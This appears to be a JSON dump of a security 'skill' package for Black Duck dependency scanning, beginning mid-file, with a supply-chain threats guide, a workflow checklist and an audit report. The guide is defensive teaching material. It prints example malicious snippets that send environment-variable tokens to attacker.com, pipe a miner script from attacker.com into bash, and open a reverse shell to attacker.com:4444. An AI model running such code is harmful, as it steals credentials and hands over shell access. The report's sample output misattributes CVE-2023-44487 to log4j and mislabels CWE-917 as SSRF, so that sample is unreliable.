Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html)\n- [CISA Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Snyk Vulnerability Database](https://security.snyk.io/)\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":13491,"content_sha256":"b4ae33edff44fe8faec0dc77575ab61bc902c507a19aa8de42c13c44ecb0d3b7"},{"filename":"references/supply_chain_threats.md","content":"# Supply Chain Security Threats\n\n## Table of Contents\n- [Threat Overview](#threat-overview)\n- [Attack Vectors](#attack-vectors)\n- [Detection Strategies](#detection-strategies)\n- [Prevention and Mitigation](#prevention-and-mitigation)\n- [Incident Response](#incident-response)\n\n## Threat Overview\n\nSupply chain attacks target the software dependency ecosystem to compromise applications through malicious or vulnerable third-party components.\n\n**Impact**: Critical - can affect thousands of downstream users\n**Trend**: Increasing rapidly (651% increase 2021-2022)\n**MITRE ATT&CK**: T1195 - Supply Chain Compromise\n\n### Attack Categories\n\n1. **Compromised Dependencies** - Legitimate packages backdoored by attackers\n2. **Typosquatting** - Malicious packages with similar names\n3. **Dependency Confusion** - Exploiting package resolution order\n4. **Malicious Maintainers** - Attackers become maintainers\n5. **Build System Compromise** - Injection during build/release process\n\n## Attack Vectors\n\n### 1. Dependency Confusion\n\n**MITRE ATT&CK**: T1195.001\n**CWE**: CWE-494 (Download of Code Without Integrity Check)\n\n**Attack Description**:\nAttackers publish malicious packages to public registries with same name as internal packages. Package managers may install public version instead of internal.\n\n**Real-World Examples**:\n- **2021**: Researcher demonstrated by uploading packages mimicking internal names at Microsoft, Apple, PayPal\n- **Impact**: Potential code execution on build servers\n\n**Attack Pattern**:\n```\nInternal Package Registry (private):\n - [email protected]\n\nPublic Registry (npmjs.com):\n - [email protected] (MALICIOUS)\n\nPackage manager resolution:\n npm install company-auth-lib\n → Installs v99.0.0 from public registry (higher version)\n```\n\n**Detection with Black Duck**:\n- Unexpected package source changes\n- Version spikes (jumping from 1.x to 99.x)\n- Multiple registries for same package\n- New publishers for established packages\n\n**Prevention**:\n```bash\n# npm - use scoped packages for internal code\nnpm config set @company:registry https://npm.internal.company.com\n\n# Configure .npmrc to prefer internal registry\n@company:registry=https://npm.internal.company.com\nregistry=https://registry.npmjs.org\n\n# Python - use index-url for internal PyPI\npip install --index-url https://pypi.internal.company.com package-name\n\n# Maven - repository order matters\n\u003crepositories>\n \u003crepository>\n \u003cid>company-internal\u003c/id>\n \u003curl>https://maven.internal.company.com\u003c/url>\n \u003c/repository>\n\u003c/repositories>\n```\n\n**Mitigation**:\n- Use scoped/namespaced packages (@company/package-name)\n- Configure package manager to prefer internal registry\n- Reserve public names for internal packages\n- Implement allowlists for external packages\n- Pin dependency versions\n\n### 2. Typosquatting\n\n**MITRE ATT&CK**: T1195.001\n**CWE**: CWE-829 (Untrusted Control Sphere)\n\n**Attack Description**:\nMalicious packages with names similar to popular packages, relying on typos during installation.\n\n**Real-World Examples**:\n- **crossenv** (mimicking cross-env) - 700+ downloads before removal\n- **electorn** (mimicking electron) - credential stealer\n- **python3-dateutil** (mimicking python-dateutil) - cryptominer\n\n**Common Typosquatting Patterns**:\n- Missing/extra character: `reqeusts` vs `requests`\n- Substituted character: `requsts` vs `requests`\n- Transposed characters: `reqeusts` vs `requests`\n- Homoglyphs: `requ𝗲sts` vs `requests` (Unicode lookalikes)\n- Namespace confusion: `@npm/lodash` vs `lodash`\n\n**Detection**:\n- Levenshtein distance analysis on new dependencies\n- Check package popularity and age\n- Review package maintainer history\n- Verify package repository URL\n\n**Black Duck Detection**:\n```python\n# Component quality indicators\n- Download count (typosquats typically low)\n- Creation date (recent for established functionality)\n- Maintainer reputation\n- GitHub stars/forks (legitimate packages have more)\n```\n\n**Prevention**:\n- Use dependency lock files (package-lock.json, yarn.lock)\n- Code review for new dependencies\n- Automated typosquatting detection tools\n- IDE autocomplete from verified sources\n\n### 3. Compromised Maintainer Accounts\n\n**MITRE ATT&CK**: T1195.002\n**CWE**: CWE-1294 (Insecure Security Identifier)\n\n**Attack Description**:\nAttackers gain access to legitimate maintainer accounts through credential compromise, then publish malicious versions.\n\n**Real-World Examples**:\n- **event-stream (2018)**: Maintainer handed over to attacker, malicious code added\n- **ua-parser-js (2021)**: Hijacked to deploy cryptocurrency miner\n- **coa, rc (2021)**: Password spraying attack on maintainer accounts\n\n**Attack Indicators**:\n- Unexpected version releases\n- New maintainers added\n- Changed package repository URLs\n- Sudden dependency additions\n- Obfuscated code in updates\n- Behavioral changes (network calls, file system access)\n\n**Detection with Black Duck**:\n```\nMonitor for:\n- Maintainer changes\n- Unusual release patterns\n- Security score degradation\n- New external dependencies\n- Build process changes\n```\n\n**Prevention**:\n- Enable 2FA/MFA for registry accounts\n- Use hardware security keys\n- Registry account monitoring/alerts\n- Code signing for packages\n- Review release process changes\n\n### 4. Malicious Dependencies (Direct Injection)\n\n**MITRE ATT&CK**: T1195.001\n\n**Attack Description**:\nEntirely malicious packages created by attackers, often using SEO or social engineering to drive adoption.\n\n**Real-World Examples**:\n- **event-stream → flatmap-stream (2018)**: Injected Bitcoin wallet stealer\n- **bootstrap-sass (malicious version)**: Credential harvester\n- **eslint-scope (2018)**: Credential stealer via compromised account\n\n**Common Malicious Behaviors**:\n- Credential harvesting (env vars, config files)\n- Cryptocurrency mining\n- Backdoor installation\n- Data exfiltration\n- Command & control communication\n\n**Example Malicious Code Patterns**:\n```javascript\n// Environment variable exfiltration\nconst secrets = {\n npm_token: process.env.NPM_TOKEN,\n aws_key: process.env.AWS_ACCESS_KEY_ID,\n github_token: process.env.GITHUB_TOKEN\n};\nfetch('https://attacker.com/collect', {\n method: 'POST',\n body: JSON.stringify(secrets)\n});\n\n// Cryptocurrency miner\nconst { exec } = require('child_process');\nexec('curl http://attacker.com/miner.sh | bash');\n\n// Backdoor\nconst net = require('net');\nconst { spawn } = require('child_process');\nconst shell = spawn('/bin/bash', []);\nnet.connect(4444, 'attacker.com', function() {\n this.pipe(shell.stdin);\n shell.stdout.pipe(this);\n});\n```\n\n**Detection**:\n- Network activity during install (install scripts shouldn't make external calls)\n- File system modifications outside package directory\n- Process spawning during installation\n- Obfuscated or minified code in source packages\n- Suspicious dependencies for package scope\n\n**Black Duck Indicators**:\n- Low community adoption for claimed functionality\n- Recent creation date\n- Lack of GitHub repository or activity\n- Poor code quality metrics\n- No documentation or minimal README\n\n### 5. Build System Compromise\n\n**MITRE ATT&CK**: T1195.003\n**CWE**: CWE-494\n\n**Attack Description**:\nCompromising the build or release infrastructure to inject malicious code during the build process.\n\n**Real-World Examples**:\n- **SolarWinds (2020)**: Build system compromise led to trojanized software updates\n- **Codecov (2021)**: Bash uploader script modified to exfiltrate credentials\n\n**Attack Vectors**:\n- Compromised CI/CD credentials\n- Malicious CI/CD pipeline configurations\n- Compromised build dependencies\n- Registry credential theft during build\n- Artifact repository compromise\n\n**Detection**:\n- Reproducible builds (verify build output matches)\n- Build artifact signing and verification\n- Supply chain levels for software artifacts (SLSA)\n- Build provenance tracking\n\n**Prevention**:\n- Secure CI/CD infrastructure\n- Minimal build environment (containers)\n- Secret management (avoid env vars in logs)\n- Build isolation and sandboxing\n- SBOM generation at build time\n\n## Detection Strategies\n\n### Static Analysis Indicators\n\n**Package Metadata Analysis**:\n```python\n# Black Duck provides these metrics\nsuspicious_indicators = {\n \"recent_creation\": age_days \u003c 30,\n \"low_adoption\": downloads \u003c 100,\n \"no_repository\": github_url == None,\n \"new_maintainer\": maintainer_age \u003c 90,\n \"version_spike\": version > expected + 50,\n \"abandoned\": last_update_days > 730\n}\n```\n\n### Behavioral Analysis\n\n**Runtime Monitoring**:\n- Network connections during install\n- File system access outside package directory\n- Process spawning (especially child processes)\n- Environment variable access\n- Encrypted/obfuscated payloads\n\n**Example Detection Script**:\n```bash\n#!/bin/bash\n# Monitor package installation for suspicious behavior\n\nstrace -f -e trace=network,process,file npm install suspicious-package 2>&1 | \\\n grep -E \"(connect|sendto|execve|openat)\" | \\\n grep -v \"npmjs.org\\|yarnpkg.com\" # Exclude legitimate registries\n\n# Any network activity to non-registry domains during install is suspicious\n```\n\n### Dependency Graph Analysis\n\n**Transitive Dependency Risk**:\n```\nYour App\n├── [email protected]\n│ └── [email protected] (✓ Safe)\n│ └── [email protected] (⚠️ Recently added)\n│ └── [email protected] (❌ SUSPICIOUS)\n```\n\n**Black Duck Features**:\n- Full dependency tree visualization\n- Transitive vulnerability detection\n- Component risk scoring\n- Supply chain risk assessment\n\n## Prevention and Mitigation\n\n### 1. Dependency Vetting Process\n\n**Before Adding Dependency**:\n```markdown\n# Dependency Vetting Checklist\n\n- [ ] Active maintenance (commits within 3 months)\n- [ ] Sufficient adoption (downloads, GitHub stars)\n- [ ] Code repository available and reviewed\n- [ ] Recent security audit or assessment\n- [ ] Compatible license\n- [ ] Minimal transitive dependencies\n- [ ] No known vulnerabilities (Black Duck scan)\n- [ ] Maintainer reputation verified\n- [ ] Reasonable package size\n- [ ] Documentation quality adequate\n```\n\n**Automated Checks**:\n```bash\n#!/bin/bash\n# Automated dependency vetting\n\nPACKAGE=$1\n\n# Check age and popularity\nnpm view $PACKAGE time.created downloads\n\n# Check for known vulnerabilities\nnpm audit\n\n# Black Duck scan\nscripts/blackduck_scan.py --project temp-vet --version 1.0.0\n\n# Check for typosquatting\npython3 -c \"\nimport Levenshtein\nfrom package_registry import get_popular_packages\n\npopular = get_popular_packages()\nfor pkg in popular:\n distance = Levenshtein.distance('$PACKAGE', pkg)\n if distance \u003c= 2:\n print(f'⚠️ Similar to {pkg} (distance: {distance})')\n\"\n```\n\n### 2. Dependency Pinning and Lock Files\n\n**Always use lock files**:\n```json\n// package.json - use exact versions for security-critical deps\n{\n \"dependencies\": {\n \"critical-auth-lib\": \"1.2.3\", // Exact version\n \"utility-lib\": \"^2.0.0\" // Allow minor updates\n }\n}\n```\n\n**Commit lock files**:\n- package-lock.json (npm)\n- yarn.lock (Yarn)\n- Pipfile.lock (Python)\n- Gemfile.lock (Ruby)\n- go.sum (Go)\n\n### 3. Subresource Integrity (SRI)\n\n**For CDN-loaded dependencies**:\n```html\n\u003c!-- Use SRI hashes for external scripts -->\n\u003cscript\n src=\"https://cdn.example.com/library.js\"\n integrity=\"sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/ux...\"\n crossorigin=\"anonymous\">\n\u003c/script>\n```\n\n### 4. Private Package Registry\n\n**Benefits**:\n- Control over approved packages\n- Caching for availability\n- Internal package distribution\n- Security scanning integration\n\n**Solutions**:\n- Artifactory (JFrog)\n- Nexus Repository\n- Azure Artifacts\n- AWS CodeArtifact\n- GitHub Packages\n\n**Configuration Example (npm)**:\n```bash\n# .npmrc\nregistry=https://artifactory.company.com/api/npm/npm-virtual/\n@company:registry=https://artifactory.company.com/api/npm/npm-internal/\n\n# Always authenticate\nalways-auth=true\n```\n\n### 5. Continuous Monitoring\n\n**Automated Scanning**:\n```yaml\n# .github/workflows/dependency-scan.yml\nname: Dependency Security Scan\n\non:\n schedule:\n - cron: '0 0 * * *' # Daily\n pull_request:\n push:\n branches: [main]\n\njobs:\n scan:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v3\n\n - name: Black Duck Scan\n run: |\n scripts/blackduck_scan.py \\\n --project ${{ github.repository }} \\\n --version ${{ github.sha }} \\\n --fail-on-policy\n\n - name: Check for new dependencies\n run: |\n git diff origin/main -- package.json | \\\n grep \"^+\" | grep -v \"^+++\" | \\\n while read line; do\n echo \"⚠️ New dependency requires review: $line\"\n done\n```\n\n### 6. Runtime Protection\n\n**Application-level**:\n```javascript\n// Freeze object prototypes to prevent pollution\nObject.freeze(Object.prototype);\nObject.freeze(Array.prototype);\n\n// Restrict network access for dependencies (if possible)\n// Use Content Security Policy (CSP) for web apps\n\n// Monitor unexpected behavior\nprocess.on('warning', (warning) => {\n if (warning.name === 'DeprecationWarning') {\n // Log and alert on deprecated API usage\n securityLog.warn('Deprecated API used', { warning });\n }\n});\n```\n\n**Container-level**:\n```dockerfile\n# Use minimal base images\nFROM node:18-alpine\n\n# Run as non-root\nUSER node\n\n# Read-only file system where possible\nVOLUME /app\nWORKDIR /app\n\n# No network access during build\nRUN --network=none npm ci\n```\n\n## Incident Response\n\n### Detection Phase\n\n**Indicators of Compromise**:\n1. Black Duck alerts on component changes\n2. Unexpected network traffic from application\n3. CPU/memory spikes (cryptocurrency mining)\n4. Security tool alerts\n5. Credential compromise reports\n6. Customer reports of suspicious behavior\n\n### Containment\n\n**Immediate Actions**:\n1. **Isolate**: Remove affected application from network\n2. **Inventory**: Identify all systems using compromised dependency\n3. **Block**: Add malicious package to blocklist\n4. **Rotate**: Rotate all credentials that may have been exposed\n\n```bash\n# Emergency response script\n#!/bin/bash\n\nMALICIOUS_PACKAGE=$1\n\n# 1. Block package in registry\ncurl -X POST https://artifactory/api/blocklist \\\n -d \"{\\\"package\\\": \\\"$MALICIOUS_PACKAGE\\\"}\"\n\n# 2. Find all projects using it\nfind /repos -name package.json -exec \\\n grep -l \"$MALICIOUS_PACKAGE\" {} \\;\n\n# 3. Emergency notification\nsend_alert \"CRITICAL: Supply chain compromise detected - $MALICIOUS_PACKAGE\"\n\n# 4. Rotate secrets\n./rotate_all_credentials.sh\n\n# 5. Re-scan all projects\nfor project in $(get_all_projects); do\n scripts/blackduck_scan.py --project $project --emergency-scan\ndone\n```\n\n### Eradication\n\n1. **Remove** malicious dependency\n2. **Replace** with safe alternative or version\n3. **Re-scan** with Black Duck to confirm\n4. **Review** logs for malicious activity\n5. **Rebuild** from clean state\n\n### Recovery\n\n1. **Deploy** patched version\n2. **Monitor** for continued malicious activity\n3. **Verify** integrity of application\n4. **Restore** from backup if necessary\n\n### Post-Incident\n\n**Root Cause Analysis**:\n- How did malicious package enter supply chain?\n- What controls failed?\n- What was the impact?\n\n**Improvements**:\n- Update vetting procedures\n- Enhance monitoring\n- Additional training\n- Technical controls\n\n## Tools and Resources\n\n**Detection Tools**:\n- **Synopsys Black Duck**: Comprehensive SCA with supply chain risk\n- **Socket.dev**: Real-time supply chain attack detection\n- **Snyk**: Vulnerability and license scanning\n- **Checkmarx SCA**: Software composition analysis\n\n**Best Practices**:\n- [CISA Supply Chain Guidance](https://www.cisa.gov/supply-chain)\n- [NIST SSDF](https://csrc.nist.gov/publications/detail/sp/800-218/final)\n- [SLSA Framework](https://slsa.dev/)\n- [OWASP Dependency Check](https://owasp.org/www-project-dependency-check/)\n\n**Incident Databases**:\n- [Supply Chain Compromises](https://github.com/IQTLabs/software-supply-chain-compromises)\n- [Backstabber's Knife Collection](https://dasfreak.github.io/Backstabbers-Knife-Collection/)\n\n## References\n\n- [Sonatype 2022 State of Software Supply Chain](https://www.sonatype.com/state-of-the-software-supply-chain)\n- [MITRE ATT&CK - Supply Chain Compromise](https://attack.mitre.org/techniques/T1195/)\n- [NIST SSDF](https://csrc.nist.gov/publications/detail/sp/800-218/final)\n- [Linux Foundation - Securing the Software Supply Chain](https://www.linuxfoundation.org/resources/publications/securing-the-software-supply-chain)\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":16454,"content_sha256":"f94b46eaa88b5b7464264e0d0f313e7cb52880ff501055f6be171a40c04ad6ea"},{"filename":"references/WORKFLOW_CHECKLIST.md","content":"# Workflow Checklist Template\n\nThis template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.\n\n## Pattern 1: Sequential Workflow Checklist\n\nUse this pattern for operations that must be completed in order, step-by-step.\n\n### Security Assessment Workflow\n\nProgress:\n[ ] 1. Identify application entry points and attack surface\n[ ] 2. Map authentication and authorization flows\n[ ] 3. Identify data flows and sensitive data handling\n[ ] 4. Review existing security controls\n[ ] 5. Document findings with framework references (OWASP, CWE)\n[ ] 6. Prioritize findings by severity (CVSS scores)\n[ ] 7. Generate report with remediation recommendations\n\nWork through each step systematically. Check off completed items.\n\n---\n\n## Pattern 2: Conditional Workflow\n\nUse this pattern when the workflow branches based on findings or conditions.\n\n### Vulnerability Remediation Workflow\n\n1. Identify vulnerability type\n - If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)\n - If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)\n - If Authentication flaw → See [auth-remediation.md](auth-remediation.md)\n - If Authorization flaw → See [authz-remediation.md](authz-remediation.md)\n - If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)\n\n2. Assess severity using CVSS calculator\n - If CVSS >= 9.0 → Priority: Critical (immediate action)\n - If CVSS 7.0-8.9 → Priority: High (action within 24h)\n - If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)\n - If CVSS \u003c 4.0 → Priority: Low (action within 30 days)\n\n3. Apply appropriate remediation pattern\n4. Validate fix with security testing\n5. Document changes and update security documentation\n\n---\n\n## Pattern 3: Iterative Workflow\n\nUse this pattern for operations that repeat across multiple targets or items.\n\n### Code Security Review Workflow\n\nFor each file in the review scope:\n1. Identify security-sensitive operations (auth, data access, crypto, input handling)\n2. Check against secure coding patterns for the language\n3. Flag potential vulnerabilities with severity rating\n4. Map findings to CWE and OWASP categories\n5. Suggest specific remediation approaches\n6. Document finding with code location and fix priority\n\nContinue until all files in scope have been reviewed.\n\n---\n\n## Pattern 4: Feedback Loop Workflow\n\nUse this pattern when validation and iteration are required.\n\n### Secure Configuration Generation Workflow\n\n1. Generate initial security configuration based on requirements\n2. Run validation script: `./scripts/validate_config.py config.yaml`\n3. Review validation output:\n - Note all errors (must fix)\n - Note all warnings (should fix)\n - Note all info items (consider)\n4. Fix identified issues in configuration\n5. Repeat steps 2-4 until validation passes with zero errors\n6. Review warnings and determine if they should be addressed\n7. Apply configuration once validation is clean\n\n**Validation Loop**: Run validator → Fix errors → Repeat until clean\n\n---\n\n## Pattern 5: Parallel Analysis Workflow\n\nUse this pattern when multiple independent analyses can run concurrently.\n\n### Comprehensive Security Scan Workflow\n\nRun these scans in parallel:\n\n**Static Analysis**:\n[ ] 1a. Run SAST scan (Semgrep/Bandit)\n[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)\n[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)\n[ ] 1d. Run license compliance check\n\n**Dynamic Analysis**:\n[ ] 2a. Run DAST scan (ZAP/Burp)\n[ ] 2b. Run API security testing\n[ ] 2c. Run authentication/authorization testing\n\n**Infrastructure Analysis**:\n[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)\n[ ] 3b. Run container image scan (Trivy/Grype)\n[ ] 3c. Run configuration review\n\n**Consolidation**:\n[ ] 4. Aggregate all findings\n[ ] 5. Deduplicate and correlate findings\n[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)\n[ ] 7. Generate unified security report\n\n---\n\n## Pattern 6: Research and Documentation Workflow\n\nUse this pattern for security research and documentation tasks.\n\n### Threat Modeling Workflow\n\nResearch Progress:\n[ ] 1. Identify system components and boundaries\n[ ] 2. Map data flows between components\n[ ] 3. Identify trust boundaries\n[ ] 4. Enumerate assets (data, services, credentials)\n[ ] 5. Apply STRIDE framework to each component:\n - Spoofing threats\n - Tampering threats\n - Repudiation threats\n - Information disclosure threats\n - Denial of service threats\n - Elevation of privilege threats\n[ ] 6. Map threats to MITRE ATT&CK techniques\n[ ] 7. Identify existing mitigations\n[ ] 8. Document residual risks\n[ ] 9. Recommend additional security controls\n[ ] 10. Generate threat model document\n\nWork through each step systematically. Check off completed items.\n\n---\n\n## Pattern 7: Compliance Validation Workflow\n\nUse this pattern for compliance checks against security standards.\n\n### Security Compliance Audit Workflow\n\n**SOC 2 Controls Review**:\n[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)\n[ ] 2. Verify logical access controls implementation (CC6.1)\n[ ] 3. Review authentication mechanisms (CC6.1)\n[ ] 4. Verify encryption implementation (CC6.1, CC6.7)\n[ ] 5. Review audit logging configuration (CC7.2)\n[ ] 6. Verify security monitoring (CC7.2, CC7.3)\n[ ] 7. Review incident response procedures (CC7.3, CC7.4)\n[ ] 8. Verify backup and recovery processes (A1.2, A1.3)\n\n**Evidence Collection**:\n[ ] 9. Collect policy documents\n[ ] 10. Collect configuration screenshots\n[ ] 11. Collect audit logs\n[ ] 12. Document control gaps\n[ ] 13. Generate compliance report\n\n---\n\n## Pattern 8: Incident Response Workflow\n\nUse this pattern for security incident handling.\n\n### Security Incident Response Workflow\n\n**Detection and Analysis**:\n[ ] 1. Confirm security incident (rule out false positive)\n[ ] 2. Determine incident severity (SEV1/2/3/4)\n[ ] 3. Identify affected systems and data\n[ ] 4. Preserve evidence (logs, memory dumps, network captures)\n\n**Containment**:\n[ ] 5. Isolate affected systems (network segmentation)\n[ ] 6. Disable compromised accounts\n[ ] 7. Block malicious indicators (IPs, domains, hashes)\n[ ] 8. Implement temporary compensating controls\n\n**Eradication**:\n[ ] 9. Identify root cause\n[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)\n[ ] 11. Patch vulnerabilities exploited\n[ ] 12. Reset compromised credentials\n\n**Recovery**:\n[ ] 13. Restore systems from clean backups (if needed)\n[ ] 14. Re-enable systems with monitoring\n[ ] 15. Verify system integrity\n[ ] 16. Resume normal operations\n\n**Post-Incident**:\n[ ] 17. Document incident timeline\n[ ] 18. Identify lessons learned\n[ ] 19. Update security controls to prevent recurrence\n[ ] 20. Update incident response procedures\n[ ] 21. Communicate with stakeholders\n\n---\n\n## Usage Guidelines\n\n### When to Use Workflow Checklists\n\n✅ **Use checklists for**:\n- Complex multi-step operations\n- Operations requiring specific order\n- Security assessments and audits\n- Incident response procedures\n- Compliance validation tasks\n\n❌ **Don't use checklists for**:\n- Simple single-step operations\n- Highly dynamic exploratory work\n- Operations that vary significantly each time\n\n### Adapting This Template\n\n1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file\n2. **Customize steps** to match your specific security tool or process\n3. **Add framework references** (OWASP, CWE, NIST) where applicable\n4. **Include tool-specific commands** for automation\n5. **Add decision points** where manual judgment is required\n\n### Checklist Best Practices\n\n- **Be specific**: \"Run semgrep --config=auto .\" not \"Scan the code\"\n- **Include success criteria**: \"Validation passes with 0 errors\"\n- **Reference standards**: Link to OWASP, CWE, NIST where relevant\n- **Show progress**: Checkbox format helps track completion\n- **Provide escape hatches**: \"If validation fails, see troubleshooting.md\"\n\n### Integration with Feedback Loops\n\nCombine checklists with validation scripts for maximum effectiveness:\n\n1. Create checklist for the workflow\n2. Provide validation script that checks quality\n3. Include \"run validator\" step in checklist\n4. Loop: Complete step → Validate → Fix issues → Re-validate\n\nThis pattern dramatically improves output quality through systematic validation.\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":8390,"content_sha256":"f667c8d5c6e5c50b491643d644082ff202a6bb94476e0e7b648c6d0e5c8a080f"},{"filename":"skill-report.json","content":"{\n \"schema_version\": \"2.0\",\n \"meta\": {\n \"generated_at\": \"2026-01-16T16:14:10.984Z\",\n \"slug\": \"agentsecops-sca-blackduck\",\n \"source_url\": \"https://github.com/AgentSecOps/SecOpsAgentKit/tree/main/skills/appsec/sca-blackduck\",\n \"source_ref\": \"main\",\n \"model\": \"claude\",\n \"analysis_version\": \"3.0.0\",\n \"source_type\": \"community\",\n \"content_hash\": \"2c8d41211d435916fdc39f7a4ce558034b8492ac6b02ad8f04abc7cb1f1470c6\",\n \"tree_hash\": \"e9bde42c8da293620ff09bfb1f3011dec327c595172370a43ab246f64b853207\"\n },\n \"skill\": {\n \"name\": \"sca-blackduck\",\n \"description\": \"Software Composition Analysis (SCA) using Synopsys Black Duck for identifying open source vulnerabilities, license compliance risks, and supply chain security threats with CVE, CWE, and OWASP framework mapping. Use when: (1) Scanning dependencies for known vulnerabilities and security risks, (2) Analyzing open source license compliance and legal risks, (3) Identifying outdated or unmaintained dependencies, (4) Integrating SCA into CI/CD pipelines for continuous dependency monitoring, (5) Providing remediation guidance for vulnerable dependencies with CVE and CWE mappings, (6) Assessing supply chain security risks and third-party component threats.\\n\",\n \"summary\": \"Software Composition Analysis (SCA) using Synopsys Black Duck for identifying open source vulnerabil...\",\n \"icon\": \"🛡️\",\n \"version\": \"0.1.0\",\n \"author\": \"AgentSecOps\",\n \"license\": \"MIT\",\n \"category\": \"appsec\",\n \"tags\": [\n \"sca\",\n \"blackduck\",\n \"dependency-scanning\",\n \"vulnerability-management\",\n \"license-compliance\",\n \"supply-chain\",\n \"cve\",\n \"owasp\"\n ],\n \"supported_tools\": [\n \"claude\",\n \"codex\",\n \"claude-code\"\n ],\n \"risk_factors\": [\n \"external_commands\",\n \"network\",\n \"scripts\"\n ]\n },\n \"security_audit\": {\n \"risk_level\": \"low\",\n \"is_blocked\": false,\n \"safe_to_publish\": true,\n \"summary\": \"This skill consists entirely of documentation, configuration templates, and CI/CD workflow examples for legitimate security tooling. All 474 static findings are FALSE POSITVES. The flagged patterns appear in educational security documentation discussing attack patterns for detection purposes, not in malicious code. The skill promotes security best practices for dependency scanning.\",\n \"risk_factor_evidence\": [\n {\n \"factor\": \"external_commands\",\n \"evidence\": [\n {\n \"file\": \"assets/ci_integration/github_actions.yml\",\n \"line_start\": 70,\n \"line_end\": 77\n }\n ]\n },\n {\n \"factor\": \"network\",\n \"evidence\": [\n {\n \"file\": \"references/supply_chain_threats.md\",\n \"line_start\": 193,\n \"line_end\": 196\n }\n ]\n },\n {\n \"factor\": \"scripts\",\n \"evidence\": [\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 137,\n \"line_end\": 138\n }\n ]\n }\n ],\n \"critical_findings\": [],\n \"high_findings\": [],\n \"medium_findings\": [],\n \"low_findings\": [],\n \"dangerous_patterns\": [],\n \"files_scanned\": 15,\n \"total_lines\": 5156,\n \"audit_model\": \"claude\",\n \"audited_at\": \"2026-01-16T16:14:10.984Z\"\n },\n \"content\": {\n \"user_title\": \"Scan dependencies for vulnerabilities and license compliance\",\n \"value_statement\": \"Open source dependencies often contain known vulnerabilities and license compliance risks. This skill integrates Synopsys Black Duck SCA to automatically detect vulnerabilities, map findings to CVE/CWE/OWASP frameworks, and enforce license compliance policies in CI/CD pipelines.\",\n \"seo_keywords\": [\n \"blackduck sca\",\n \"dependency scanning\",\n \"vulnerability management\",\n \"software composition analysis\",\n \"license compliance\",\n \"cve detection\",\n \"claude\",\n \"codex\",\n \"claude-code\",\n \"owasp\"\n ],\n \"actual_capabilities\": [\n \"Scan project dependencies for known vulnerabilities using Black Duck Detect\",\n \"Map vulnerability findings to CVE, CWE, and OWASP Top 10 categories\",\n \"Analyze open source license compliance and identify risky licenses\",\n \"Generate Software Bill of Materials (SBOM) in CycloneDX or SPDX formats\",\n \"Integrate SCA scanning into GitHub Actions, GitLab CI, and Jenkins pipelines\",\n \"Apply security policies that fail builds on critical and high severity vulnerabilities\"\n ],\n \"limitations\": [\n \"Requires Synopsys Black Duck subscription or on-premise installation\",\n \"API token and Black Duck URL must be configured as environment variables\",\n \"Does not perform SAST or DAST - only dependency composition analysis\",\n \"Scans are executed by external Black Duck Detect tool, not by this skill\"\n ],\n \"use_cases\": [\n {\n \"target_user\": \"Security Engineers\",\n \"title\": \"Vulnerability monitoring\",\n \"description\": \"Continuously monitor production dependencies for new CVEs and enforce remediation SLAs\"\n },\n {\n \"target_user\": \"DevOps Teams\",\n \"title\": \"CI/CD security gates\",\n \"description\": \"Block deployments when critical or high severity vulnerabilities are detected in dependencies\"\n },\n {\n \"target_user\": \"Legal Teams\",\n \"title\": \"License compliance audits\",\n \"description\": \"Identify GPL, AGPL, and other restricted licenses that may create legal liability\"\n }\n ],\n \"prompt_templates\": [\n {\n \"title\": \"Quick dependency scan\",\n \"scenario\": \"Scan project for vulnerabilities\",\n \"prompt\": \"Scan this project for dependency vulnerabilities using Black Duck. Show me all critical and high severity findings with their CVE numbers, affected versions, and remediation recommendations.\"\n },\n {\n \"title\": \"License compliance check\",\n \"scenario\": \"Analyze license risks\",\n \"prompt\": \"Review the dependencies in this project and identify any license compliance risks. Categorize by risk level and suggest alternatives for high risk licenses like GPL or AGPL.\"\n },\n {\n \"title\": \"CI/CD integration\",\n \"scenario\": \"Configure pipeline scanning\",\n \"prompt\": \"Create a GitHub Actions workflow that runs Black Duck SCA on every pull request and fails the build if any critical vulnerabilities are found.\"\n },\n {\n \"title\": \"SBOM generation\",\n \"scenario\": \"Generate software bill of materials\",\n \"prompt\": \"Generate a CycloneDX SBOM for this project showing all direct and transitive dependencies with their license information and version numbers.\"\n }\n ],\n \"output_examples\": [\n {\n \"input\": \"Scan this project and show critical vulnerabilities with remediation guidance\",\n \"output\": [\n \"Critical Vulnerabilities Found: 2\",\n \"\",\n \"1. CVE-2023-44487 (CRITICAL, CVSS 9.8)\",\n \" Component: [email protected]\",\n \" Fix Available: Upgrade to 2.17.2 or later\",\n \" CWE: CWE-917 (SSRF)\",\n \" OWASP: A06:2021 (Vulnerable Components)\",\n \" Remediation: Update log4j-core version in pom.xml\",\n \"\",\n \"2. CVE-2023-39325 (HIGH, CVSS 9.8)\",\n \" Component: golang.org/x/[email protected]\",\n \" Fix Available: Upgrade to 0.17.0 or later\",\n \" CWE: CWE-787 (Out-of-bounds Write)\",\n \" Remediation: Update golang.org/x/net dependency\"\n ]\n },\n {\n \"input\": \"Check license compliance for this Node.js project\",\n \"output\": [\n \"License Compliance Results:\",\n \"\",\n \"High Risk Licenses (Action Required):\",\n \" - GPL-3.0: 2 dependencies require license review\",\n \" - AGPL-3.0: 1 dependency requires legal approval\",\n \"\",\n \"Warning List (Monitor):\",\n \" - LGPL-2.1: 3 dependencies - verify dynamic linking\",\n \" - MPL-2.0: 1 dependency - file-level copyleft\",\n \"\",\n \"Approved Licenses:\",\n \" - MIT: 45 dependencies\",\n \" - Apache-2.0: 23 dependencies\",\n 